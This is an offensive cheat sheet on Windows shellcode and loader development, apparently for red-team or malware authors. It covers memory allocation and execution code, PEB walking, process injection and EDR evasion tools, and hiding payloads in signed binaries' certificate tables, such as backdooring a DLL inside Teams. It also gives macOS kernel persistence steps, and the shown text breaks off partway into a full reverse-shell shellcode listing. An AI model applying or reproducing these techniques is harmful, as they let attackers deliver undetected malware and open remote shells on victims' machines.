Shellcode Development Workflow
- Define concept and target platform (x86/x64, Windows/Linux/macOS)
- Write assembly using position-independent techniques
- Extract binary and test in controlled environment
- Apply null byte avoidance and optimizations
- Encode/encrypt to evade static detection
- Package with loader and choose delivery method
Basic Concepts
Execution Pattern (Allocate-Write-Execute)
Avoid direct PAGE_EXECUTE_READWRITE; prefer:
- Allocate with PAGE_READWRITE
- Write shellcode to allocated region
- Call VirtualProtect to switch to PAGE_EXECUTE_READ
char *dest = VirtualAlloc(NULL, 0x1234, MEM_COMMIT|MEM_RESERVE, PAGE_READWRITE);
memcpy(dest, shellcode, 0x1234);
VirtualProtect(dest, 0x1234, PAGE_EXECUTE_READ, &old);
((void(*)())dest)();
Position-Independent Code (PIC) Techniques
| Method | Platform | Notes |
|---|---|---|
| Call/Pop | Windows | Push next addr, pop into register |
| FPU state | Windows | fstenv saves instruction pointer |
| SEH | Windows | Exception handler stores EIP |
| GOT | Linux | Global Offset Table |
| VDSO | Linux | Kernel-provided shared object |
Windows API Resolution (PEB Walk)
Identifying kernel32.dll without imports:
- Get PEB via gs:[0x60] (x64) or fs:[0x30] (x86)
- Walk PEB->Ldr.InMemoryOrderModuleList; order: exe → ntdll → kernel32
- Hash-compare module names to locate kernel32
- Parse the Export Address Table (EAT)
- Find GetProcAddress by name hash, then resolve LoadLibraryA
- Use LoadLibraryA to load WS2_32.dll, resolve Winsock functions
WinDbg helpers for debugging PEB walk:
dt nt!_TEB -y ProcessEnvironmentBlock @$teb
dt nt!_PEB -y Ldr <peb_addr>
dt -r _PEB_LDR_DATA <ldr_addr>
dt _LDR_DATA_TABLE_ENTRY (<init_flink_addr> - 0x10)
lm m kernel32 # verify base address
r @r8 # check register
Shellcode Loaders
Loader Responsibilities
- Environment verification / keying (sandbox detection)
- Shellcode decryption
- Safe memory allocation and injection
- Ends its duties after injecting
Recommended languages: Zig (small, no runtime), Rust (secure), Nim, Go (watch for runtime signatures)
Allocation Phase
Avoid RWX allocations — use two-step:
- VirtualAllocEx / NtAllocateVirtualMemory: allocate RW
- ZwCreateSection + NtMapViewOfSection: alternative approach
- After writing: VirtualProtectEx to switch to RX
Other options: code caves, stack/heap (with DEP disabled)
Write Phase
- WriteProcessMemory / NtWriteVirtualMemory
- memcpy to mapped section
Evasion tips:
- Prepend shellcode with dummy opcodes
- Split into chunks, write in randomized order
- Add delays between writes
Execute Phase
Most scrutinized step — EDR checks thread start address against image-backed memory:
| Technique | Notes |
|---|---|
| CreateRemoteThread / ZwCreateThreadEx | Loud, heavily monitored |
| NtSetContextThread | Hijack suspended thread |
| NtQueueApcThreadEx | APC injection |
| API trampolines | Overwrite function prologue |
| ThreadlessInject | No new threads created |
PE-to-Shellcode Conversion
| Tool | Purpose |
|---|---|
| Donut | EXE/DLL → shellcode |
| sRDI | DLL → position-independent shellcode |
| Pe2shc | PE → shellcode |
| Amber | Reflective PE packer |
Open-source loaders:
- ScareCrow
- NimPackt-v1
- NullGate — indirect syscalls + junk-write sequencing
- DripLoader — chunked RW writes + direct syscalls + JMP trampoline
- ProtectMyTooling — chain multiple protections
- Direct-syscall helpers: SysWhispers3, FreshyCalls (now baseline requirements)
Shellcode Storage & Hiding
| Location | Risk | Notes |
|---|---|---|
| Hardcoded in .text | Medium | Requires recompile; stored RW/RO |
| PE Resources (RCDATA) | High | Most scanned by AV |
| Extra PE section | Medium | Use second-to-last section |
| Certificate Table | Low | Keeps signed PE signature intact |
| Internet-hosted | Variable | SharpShooter |
Certificate Table technique (recommended):
- Pad Certificate Table with shellcode bytes; update PE headers
- Backdoor only the loader DLL (e.g., ffmpeg.dll in teams.exe)
- Main executable signature remains valid; only the DLL signature breaks
Protection: Compress with LZMA; encrypt with XOR32, RC4, or AES before storing.
Windows 11 24H2 note: AMSI heap scanning is active. Allocate with PAGE_NOACCESS, decrypt in place, then switch to PAGE_EXECUTE_READ to avoid live-heap scans.
Evasion
Progressive Evasion Escalation
- Basic shellcode execution (baseline)
- Add XOR/AES encryption + obfuscation
- Direct syscalls to bypass userland hooks
- Remote process injection as last resort
Local vs Remote Injection
Remote injection is more detectable:
- CFG/CIG enforcement
- ETW Ti feeds
- EDR call-stack back-tracing (NtOpenProcess invocation source)
- More scrutinized steps: OpenProcess → Allocate → Write → Execute
Defender bypass tools (DefenderBypass):
- myEncoder3.py: XOR-encrypt binary shellcode
- InjectBasic.cpp: basic C++ injector
- InjectCryptXOR.cpp: XOR decrypt + inject
- InjectSyscall-LocalProcess.cpp: direct syscalls, no suspicious IAT entries
- InjectSyscall-RemoteProcess.cpp: remote process injection via direct syscalls
Cross-Platform Considerations
Windows on ARM64 (WoA)
- Syscalls use SVC 0 with ARM64 table in ntdll!KiServiceTableArm64
- Pointer Authentication (PAC) signs LR; avoid stack pivots or re-sign with PACIASP
Linux 6.9+ (eBPF Arena)
- BPF_MAP_TYPE_ARENA maps can hold executable memory
- Hide shellcode chunks in arena map, execute via bpf_prog_run_pin_on_cpu
macOS (Signed System Volume)
- macOS 12+ seals the system partition; unsigned payloads cannot reside there
- Userspace: launch agents, dylib hijacks in /Library/Apple/System/Library/Dyld/
- Kernel persistence: create sealed snapshot, mount RW, inject, resign with kmutil, bless
DripLoader Technique
github.com/xuanxuan0/DripLoader:
- Reserve 64KB chunks with NO_ACCESS
- Allocate 4KB RW chunks within that pool
- Write shellcode in chunks in randomized order
- Re-protect to RX
- Overwrite prologue of ntdll!RtlpWow64CtxFromAmd64 with JMP trampoline
- All calls via direct syscalls: NtAllocateVirtualMemory, NtWriteVirtualMemory, NtCreateThreadEx
Full x64 Reverse Shell Shellcode (Windows)
Complete Python/Keystone example implementing PEB walk → GetProcAddress → LoadLibraryA → Winsock connect → CreateProcessA(cmd.exe):
import ctypes, struct
from keystone import *
CODE = (
# Locate kernel32 Base Address
" start: "
" add rsp, 0xfffffffffffffdf8 ;" # Avoid Null Byte and make some space
" find_kernel32: "
" int3 ;" # WinDbg breakpoint (disable for release)
" xor rcx, rcx ;"
" mov rax, gs:[rcx + 0x60] ;" # RAX = PEB
" mov rax, [rax + 0x18] ;" # RAX = PEB->Ldr
" mov rsi, [rax + 0x20] ;" # RSI = InMemoryOrderModuleList
" lodsq ;"